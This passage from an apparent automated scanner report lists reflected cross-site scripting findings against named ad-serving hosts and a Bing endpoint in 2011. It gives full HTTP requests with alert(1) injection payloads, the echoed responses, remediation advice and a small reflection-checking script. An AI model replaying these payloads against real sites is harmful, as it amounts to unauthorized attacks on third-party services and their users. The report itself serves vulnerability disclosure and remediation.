HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:03 GMT X-Name: rtb-o03 Content-Type: text/javascript Connection: close Content-Length: 160
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5e8'%3balert(1)//fba03bbdfb2 was submitted in the admeld_adprovider_id parameter. This input was echoed as ff5e8';alert(1)//fba03bbdfb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73ff5e8'%3balert(1)//fba03bbdfb2&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2d68'%3balert(1)//7361267a395 was submitted in the admeld_callback parameter. This input was echoed as e2d68';alert(1)//7361267a395 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clicksense/admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche2d68'%3balert(1)//7361267a395 HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2r4Mi92x-Y-; 1609092=00000000001
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 6c86c<script>alert(1)</script>03ede497a81 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=8797686c86c<script>alert(1)</script>03ede497a81&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:30 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2536
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "8797686c86c<script>alert(1)</script>03ede497a81"
The value of the placementId request parameter is copied into an HTML comment. The payload 842ea--><script>alert(1)</script>48d2a0518b4 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369842ea--><script>alert(1)</script>48d2a0518b4&pid=879768&ps=-1&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:21 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3402
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1341369842ea--><script>alert(1)</script>48d2a0518b4" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 68d8c--><script>alert(1)</script>c52ad980c6e was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341369&pid=879768&ps=-168d8c--><script>alert(1)</script>c52ad980c6e&zw=320&zh=280&url=http%3A//www.thestreet.com/story/229c029d89d776ed%29%28sn%3D*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html&v=5&dct=Sorry%2C%20the%20page%20you%20requested%20could%20not%20be%20found&ref=http%3A//burp/show/16 HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:23:42 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3841
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-168d8c--><script>alert(1)</script>c52ad980c6e" -->
...[SNIP]...
1.58. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbeb5"-alert(1)-"cefe6b77701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&dbeb5"-alert(1)-"cefe6b77701=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754832540&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F66 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:40 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 18:53:40 GMT Pragma: no-cache Content-Length: 5050 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... ype = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&dbeb5"-alert(1)-"cefe6b77701=1&s=1678185&_salt=3597926079";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48655'%3balert(1)//ba986b9e810 was submitted in the h parameter. This input was echoed as 48655';alert(1)//ba986b9e810 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E&w=728&h=9048655'%3balert(1)//ba986b9e810 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:08:06 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9352f"%3balert(1)//887397266bd was submitted in the pid parameter. This input was echoed as 9352f";alert(1)//887397266bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E9352f"%3balert(1)//887397266bd&w=728&h=90 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:07:49 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E9352f";alert(1)//887397266bd&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d76ed'%3balert(1)//7fc95e77677 was submitted in the w parameter. This input was echoed as d76ed';alert(1)//7fc95e77677 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=C8EFE2E&w=728d76ed'%3balert(1)//7fc95e77677&h=90 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 381 Date: Thu, 03 Feb 2011 16:07:54 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=C8EFE2E&rand=" + myRand;
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9934'-alert(1)-'9b44b809a0d was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0e9934'-alert(1)-'9b44b809a0d HTTP/1.1 Host: ads.specificmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:37 GMT Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0 Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:37 GMT P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV" Content-Length: 370 Expires: Wed, 02 Feb 2011 18:53:37 GMT Cache-Control: no-cache,must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript
1.63. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.specificmedia.com
Path: /serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15f9d'-alert(1)-'2c3bcbaf79d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/v=5;m=2;l=10980;cxt=99061898:2148402-10000150:2148402;kw=;ts=62446;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3DzB_hgTzzd8E%3Btm%3D0-0&15f9d'-alert(1)-'2c3bcbaf79d=1 HTTP/1.1 Host: ads.specificmedia.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296754789156&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5035.928757113086138685
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:53:38 GMT Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0 Set-cookie: smu=5066.928757113086138685; domain=.specificmedia.com; path=/; expires=Fri, 08-Jan-2016 18:53:38 GMT P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV" Content-Length: 373 Expires: Wed, 02 Feb 2011 18:53:38 GMT Cache-Control: no-cache,must-revalidate Pragma: no-cache Connection: close Content-Type: application/x-javascript
1.64. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserving.cpxinteractive.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4b7"-alert(1)-"af13f1e484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context. Request parameter names require the same treatment as their values.
Request
GET /st?ad_type=pop&ad_size=0x0&section=1421534&banned_pop_types=28&pop_times=1&pop_frequency=86400&fa4b7"-alert(1)-"af13f1e484=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:03:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 03 Feb 2011 16:03:28 GMT
Pragma: no-cache
Content-Length: 4400
Age: 0
Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1421534; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=28&fa4b7"-alert(1)-"af13f1e484=1&s=1421534&_salt=3329141379";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 was submitted in the q parameter. This input was echoed as d1d97<img src=a onerror=alert(1)>37234bbbf48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Note that the response below is served with Content-Type: application/json; the reflected tag is inert while the endpoint is consumed as JSON and only fires if the body is rendered as HTML, for example when a caller inserts it into a page as markup or a browser ignores the declared type. Confirm this in the target browser before rating the finding.
Request
GET /qsonhs.aspx?FORM=ASAPIW&q=d1d97<img%20src%3da%20onerror%3dalert(1)>37234bbbf48 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=online+banking&go=&form=QBLH&qs=n&sk=&sc=8-10
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; _FP=; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM; RMS=F=G; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: 2284389bc6f9439a8eeedd3f98885c17
Date: Thu, 03 Feb 2011 13:42:59 GMT
Connection: close
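As an added example (not part of the report), the check below reproduces the "echoed as ..." observation from a raw response body: it locates the two canaries that bracket the probe, extracts what came back between them and reports which metacharacters of the probe survived unencoded, treating a backslash-escaped quote as dead. The four response bodies are constructed for the example; the canaries and probes are those used in the findings on this page.

```javascript
// Added example (not code from the report or the scanned applications):
// re-checking a reflected-input finding from a raw response body.

// Metacharacters whose survival decides whether a reflection is exploitable.
var META = ['"', "'", '<', '>', '/', ';'];

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\\/]/g, '\\$&');
}

// True when ch occurs in text without a preceding backslash (a JS-escaped
// quote such as \" is not a live metacharacter).  A full check would
// tokenise the response; this is enough to separate the cases below.
function occursUnescaped(text, ch) {
  return new RegExp('(^|[^\\\\])' + escapeRegExp(ch)).test(text);
}

// Return the text found between the two canaries, or null if absent.
function extractReflection(body, prefix, suffix) {
  var start = body.indexOf(prefix);
  if (start < 0) return null;
  var end = body.indexOf(suffix, start + prefix.length);
  if (end < 0) return null;
  return body.slice(start + prefix.length, end);
}

// Compare what was sent with what came back and list the surviving
// metacharacters in META order.
function checkReflection(body, prefix, probe, suffix) {
  var echoed = extractReflection(body, prefix, suffix);
  if (echoed === null) {
    return { reflected: false, verbatim: false, echoed: null, survived: [] };
  }
  var survived = META.filter(function (c) {
    return probe.indexOf(c) >= 0 && occursUnescaped(echoed, c);
  });
  return { reflected: true, verbatim: echoed === probe, echoed: echoed, survived: survived };
}

// Constructed sample responses (hosts and surrounding code are illustrative;
// canaries and probes are the ones the findings used).
var CASES = {
  jsonVerbatim: { prefix: 'd1d97', probe: '<img src=a onerror=alert(1)>', suffix: '37234bbbf48',
    body: '{"q":"d1d97<img src=a onerror=alert(1)>37234bbbf48","r":[]}' },
  htmlEncoded: { prefix: 'd1d97', probe: '<img src=a onerror=alert(1)>', suffix: '37234bbbf48',
    body: '<b>d1d97&lt;img src=a onerror=alert(1)&gt;37234bbbf48</b>' },
  jsStringUnescaped: { prefix: 'fa4b7', probe: '"-alert(1)-"', suffix: 'af13f1e484',
    body: 'rm_url = "http://ads.example.invalid/imp?y=28&fa4b7"-alert(1)-"af13f1e484=1";' },
  jsStringEscaped: { prefix: 'fa4b7', probe: '"-alert(1)-"', suffix: 'af13f1e484',
    body: 'rm_url = "http://ads.example.invalid/imp?y=28&fa4b7\\"-alert(1)-\\"af13f1e484=1";' }
};

function demoReflectionCheck() {
  var out = {};
  Object.keys(CASES).forEach(function (k) {
    var c = CASES[k];
    out[k] = checkReflection(c.body, c.prefix, c.probe, c.suffix);
  });
  return out;
}
```

Run with node; demoReflectionCheck() reports the JSON body echoing < and > verbatim, the entity-encoded body and the backslash-escaped body with no live metacharacters, and the unescaped JS string with a live double quote, which is the distinction between "echoed unmodified" and a harmless reflection.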
The value of the template request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d35cb'%3balert(1)//c971cafb721 was submitted in the template parameter. This input was echoed as d35cb';alert(1)//c971cafb721 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that in the response below the reflection sits inside the index expression wv_available_vars['...']: the injected // comments out the remainder of that line, including the closing '] = true;, so the script as shown is left with an unterminated bracket and is rejected by the JavaScript parser rather than executed. Execution should be confirmed in a browser, with a payload that leaves the statement well-formed, before the finding is rated as exploitable.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be emitted inside a JavaScript string literal, it should be escaped for that context before output (the backslash, both quote characters, line terminators and, for script embedded in an HTML page, the < and / characters), for example as \xHH or \uHHHH sequences; HTML entity encoding on its own does not protect a script context.
Request
GET /as/InitiateCall2.php?accountid=200106286435&template=655713d35cb'%3balert(1)//c971cafb721&checklinkstatus=1 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
Referer: http://www201.americanexpress.com/business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0%22%3balert(1)//2536ed24016
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
